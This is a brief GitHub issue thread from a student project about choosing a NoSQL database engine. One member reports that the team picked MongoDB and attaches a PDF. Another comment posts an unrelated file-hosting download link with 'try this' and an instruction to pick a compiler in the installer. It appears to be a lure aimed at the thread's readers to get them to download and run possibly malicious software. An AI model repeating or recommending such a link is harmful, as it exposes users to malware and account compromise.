### ISSUE TITLE
Elegir Motor NOSQL

### ISSUE THREAD

**Issue by BigAndres1209a** [ISCOUTB/AH-PETSADDOPT#11]

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by serna0120** [comment]
Escogimos MongoDB como motor para NoSql[ELECCION DE MOTOR PARA NOSQL.pdf](https://github.com/user-attachments/files/16957046/ELECCION.DE.MOTOR.PARA.NOSQL.pdf)
